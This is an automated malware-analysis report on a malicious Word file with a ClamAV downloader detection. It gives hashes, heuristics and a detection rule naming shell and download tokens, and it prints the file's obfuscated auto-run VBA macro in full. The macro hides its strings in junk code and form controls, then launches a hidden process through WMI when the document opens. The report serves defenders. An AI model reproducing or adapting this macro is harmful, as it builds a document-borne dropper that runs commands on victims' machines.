Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 592a0ef2e88f78e3…

MALICIOUS

Office (OOXML)

136.6 KB Created: 2020-01-24 22:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-19
MD5: 81d4ba4c3543eb5138999725b15ff867 SHA-1: 19fe7c7c117cd23e33eaa55accf366c917e4fdb5 SHA-256: 592a0ef2e88f78e312bb01885b175903af622c96256d39f2186982f551c14c7d
230 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-7561169-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7561169-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Rjpbcrutd = GetObject(Weasnwdnbgv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13235 bytes
SHA-256: f9b6a17641c88efa7890b50683f123122dbc10ce9d97981bc88a139449efe9ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Zaicbhqx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()





Call Wvuwgsgzf








End Sub

Attribute VB_Name = "Allaphlvlegir"
Attribute VB_Base = "0{E96AE64B-8751-4BCF-88CC-186FDE30B221}{E2C24FB5-81D4-4B1D-98DB-34552D6A2C45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Jmrbvjcicfqw"
Attribute VB_Base = "0{3C519328-989A-4463-9CC1-C8664B6740AC}{245B0657-254C-47F3-BE21-CB26A6E927DF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Gcgfgthcvu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Wjxlvoebno"
Attribute VB_Base = "0{93B66BE5-79BE-4876-AC7C-8F8D24EDAFDE}{E7C194F9-9CEA-4090-B312-302606DAE5EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Miiierqdxqdu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Zrnhqxiim"
Attribute VB_Base = "0{E0CCE00E-AA48-4FD2-AB70-153AE5C1A02A}{90396BBD-9A62-4CF1-A549-5DDE2FA93B03}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qjcrewrfnt()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Zxedppffdx"
Attribute VB_Base = "0{FBDA25B8-1FA0-437C-8AF5-1BDB1FF27507}{791B7A14-A82E-4D4D-B913-BBDD25D9C11D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Nnfxzkdwpxo()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Ltumoanbfoj"
Attribute VB_Base = "0{C1931648-5331-4420-ACF1-F24599CDB457}{525712C8-37E3-473D-9DE8-D34AC962B0AC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Stgnhsvneqqu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Pbvcjwpd"
Attribute VB_Base = "0{80CFD329-ED4C-4FE4-96DF-AEE5A2B43D60}{6BA979E3-35F6-4ADB-AF12-4088CEF6AF92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Towanhzwkg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Pcqvmahcds"
Attribute VB_Base = "0{47F96D57-D96E-4537-BF9D-4CC01718A002}{57A0B260-2DD2-45B7-AE3F-917712D7BCD4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Xzkmaqdoxvtsw()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Xrujalfm"
Attribute VB_Base = "0{14DEB8BD-DAF0-4A43-AD90-FF88F50C68D7}{7A0D4784-C3F6-46C2-BA99-107744332C2B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Nkowthbhzd()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Mvucdmuiyzrak"
Attribute VB_Base = "0{83C07A3A-7649-4E66-B3BD-36E92CC70CBA}{DFC08DDD-6203-4176-898B-1472516D67D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ihlrmqamfp()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Nslwrlze"
Attribute VB_Base = "0{AF40F193-2AFA-47BF-9329-F845B40EEC6D}{DEDDE52C-69E1-4A72-9B52-543291B4352A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Yhtslnosomj()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Znlbhmjpnmjg"
Attribute VB_Base = "0{F0450B17-CD00-4C36-B776-E827FEBDAE6F}{241FD615-A313-45E2-AF9C-4EAACA56A9E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Caokflujey()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Mxnafupal"
Attribute VB_Base = "0{3DDD2F6C-0C24-4D3F-A05A-5E6F7A259D35}{C7F168E0-259C-40D8-AC6A-188F53B1F767}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kssozlvkl()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Lszbdnxq"
Attribute VB_Base = "0{7F3F702A-BCB6-41F8-A4B9-A5582903CF50}{9E774E1B-54D2-4400-896A-F6136D3BCBCC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Hbzmcmgoqq()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tesmwvyjoikm"
Attribute VB_Base = "0{B32839A1-61DD-4F4A-9572-3FCF7B5C00DF}{A4382E28-F46F-4E97-BE52-F8EAEFE030E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Bdqccuatdqtc()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Ovuezryujqqcs"
Attribute VB_Base = "0{CCD4B723-0230-4AE6-B15D-0578D97D90C4}{7387A40B-285F-4D5C-9FCC-8B09D3C45D6D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Yrmahkcxongta()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tuyzvsnf"
Attribute VB_Base = "0{79238E24-5744-44C2-B73A-11781B0681EF}{E426A2A1-F43F-4898-9697-41D5A4691F3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Vhualacauezg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Olxgrsyxtix"
Attribute VB_Base = "0{FF3130CC-2D84-4651-8920-0F8E8F485A9B}{97EE7547-BF19-46B3-A3C5-C62D9BDADBD8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Tdfllagl()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Xcnesfxbm"
Attribute VB_Base = "0{110322CC-C0BB-4CA1-9CE0-4BB91C6CD5D7}{A721B7E2-2EB9-4A41-803F-F842F281439C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kjugouvxom()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Wixpsngveld"
Attribute VB_Base = "0{6C1B038D-CC74-40F2-AC9F-5EE88F280DBE}{B06A8166-CC45-435B-BF05-ECF0DB918791}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Dofsvgle()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tkexgknpw"
Attribute VB_Base = "0{907126C4-6DAC-4145-B351-4D961A2C4D07}{D99BD503-26DF-4247-9A22-BE00AF24B19A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qvvqeofwezg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Lfqfsgql"
Attribute VB_Base = "0{D3F5C1A2-D13B-43B8-B8AE-45E788758A0B}{7C0F5369-0E81-4A05-928E-080221EABD87}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Denqalqw()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Qmskcqsgh"
Attribute VB_Base = "0{43E39219-31E0-4473-8097-FB6BC16E113B}{B6CEBA73-6F96-483A-9445-3845750B1C09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Npbmauhwqe()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Bjbxamosjet"
Function Gdgdwwjopp()
   c = Pjrzmbvp
b = "{trashwords1}"
k = 180
o = Saywvrah
n = 189
L = 721
M = 783
h = (Kwnpqyizunmj)
s = "{trashwords1}"
o = 86
h = ("{trashwords1}")
Lchztelbwq = ChrW(owdsd + wdKeyP + kwm)
   c = Fcnfecokt
b = "{trashwords1}"
k = 647
o = Htciqpmlkkd
n = 158
L = 661
M = 374
h = (Ikbsnwol)
s = "{trashwords1}"
o = 67
h = ("{trashwords1}")
Gzimsbrgyoyt = Lchztelbwq + Allaphlvlegir.Fsqmpuaursf + Allaphlvlegir.Iqtkwkjhfht
   c = Ucwofbciv
b = "{trashwords1}"
k = 198
o = Hwdozxulfiysb
n = 136
L = 922
M = 506
h = (Smqdiaifvkjdk)
s = "{trashwords1}"
o = 752
h = ("{trashwords1}")
omwn = Allaphlvlegir.Uohjajjx.ControlTipText
Jbatyaksujc = Split(Gzimsbrgyoyt + CVar(StrReverse(omwn)), "i_^^najks===///")
   c = Heaigjoeqe
b = "{trashwords1}"
k = 15
o = Chpytptyvo
n = 468
L = 936
M = 619
h = (Jowvnppcifte)
s = "{trashwords1}"
o = 602
h = ("{trashwords1}")
Gdgdwwjopp = Join(Jbatyaksujc, "")
   c = Wdtkamvzlng
b = "{trashwords1}"
k = 394
o = Awbdosqb
n = 627
L = 811
M = 713
h = (Irvvuxgis)
s = "{trashwords1}"
o = 374
h = ("{trashwords1}")
End Function
Function Wvuwgsgzf()
mdnuuw = "i_^^najks===///i_^^najks===///ii_^^najks===///ni_^^najks===///mi_^^najks===///gi_^^najks===///mti_^^najks===///" + ChrW(Int(wdKeyS)) + ":i_^^najks===///i_^^najks===///wii_^^najks===///i_^^najks===///n3i_^^najks===///2_i_^^najks===///i_^^najks===///" + Allaphlvlegir.Tuhihkvwri + "i_^^najks===///roci_^^najks===///i_^^najks===///esi_^^najks===///si_^^najks===///i_^^najks===///"
   c = Dquhzjfx
b = "{trashwords1}"
k = 768
o = Ghsvkzjee
n = 793
L = 138
M = 408
h = (Qucyzazc)
s = "{trashwords1}"
o = 933
h = ("{trashwords1}")
ienloqw = "i_^^najks===///"
   c = Hwglwqivan
b = "{trashwords1}"
k = 900
o = Hovwrfdt
n = 514
L = 560
M = 843
h = (Vgwqlvooy)
s = "{trashwords1}"
o = 398
h = ("{trashwords1}")
Ynbpmscmnlgd = Split("i_^^najks===///wi_^^najks===///i_^^najks===///i_^^najks===///" + mdnuuw + mmnnnsde, ienloqw)
   c = Gpwbaqbvqr
b = "{trashwords1}"
k = 351
o = Hdbijynego
n = 332
L = 833
M = 472
h = (Eojskefnjl)
s = "{trashwords1}"
o = 64
h = ("{trashwords1}")
Weasnwdnbgv = Join(Ynbpmscmnlgd, "")
   c = Nddehhyxasf
b = "{trashwords1}"
k = 802
o = Dsbfmjamqjds
n = 349
L = 169
M = 119
h = (Mdodmjbg)
s = "{trashwords1}"
o = 215
h = ("{trashwords1}")
Set Rjpbcrutd = GetObject(Weasnwdnbgv)
   c = Owiikexatujv
b = "{trashwords1}"
k = 369
o = Lihhdihk
n = 946
L = 220
M = 740
h = (Pdjwaqlbs)
s = "{trashwords1}"
o = 304
h = ("{trashwords1}")
Csrjoezk = Allaphlvlegir.Vjbuoraa.Tag
Sjegmjcx = Weasnwdnbgv + ChrW(mmsnu + wdKeyS) + Allaphlvlegir.Hsqfwyivvans.Tag + Csrjoezk
   c = Jqxrbufpxz
b = "{trashwords1}"
k = 233
o = Wkybvzdbdfcq
n = 86
L = 551
M = 295
h = (Avoievngfk)
s = "{trashwords1}"
o = 596
h = ("{trashwords1}")
Qytjpacecpfs = Sjegmjcx + Allaphlvlegir.Tuhihkvwri
   c = Mppterwgm
b = "{trashwords1}"
k = 699
o = Ohwnhyjof
n = 675
L = 228
M = 566
h = (Aixuxolgygeig)
s = "{trashwords1}"
o = 196
h = ("{trashwords1}")
Set Wvuwgsgzf = GetObject(Qytjpacecpfs)
   c = Rdsqeozv
b = "{trashwords1}"
k = 390
o = Iqystkxei
n = 990
L = 693
M = 387
h = (Nolhugpkv)
s = "{trashwords1}"
o = 417
h = ("{trashwords1}")
Wvuwgsgzf. _
SHoWwiNDow! = False
   c = Xkamhkvzbetu
b = "{trashwords1}"
k = 834
o = Hhpmgpfxyxe
n = 27
L = 57
M = 545
h = (Mjfndmvjfgb)
s = "{trashwords1}"
o = 472
h = ("{trashwords1}")
Do While Rjpbcrutd. _
Create(mxuws & Gdgdwwjopp, Bujzzztgtjmes, Wvuwgsgzf, Zroztgah, Qakbloopnmaa, Gmizdaegf, Jrrjrbmwhjyje, Xoenzyljsgxb, Njvoecxwfw, Eyvhcdricpc)
Loop
   c = Ujxteavtuzz
b = "{trashwords1}"
k = 246
o = Fymterlou
n = 819
L = 872
M = 36
h = (Efgosmmiz)
s = "{trashwords1}"
o = 213
h = ("{trashwords1}")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 114688 bytes
SHA-256: f64d2b6a55863edece62dbe48285851d53c57ee71a4216958a8821de94965691
Detection
ClamAV: Doc.Downloader.Generic-7561169-0
Obfuscation or payload: unlikely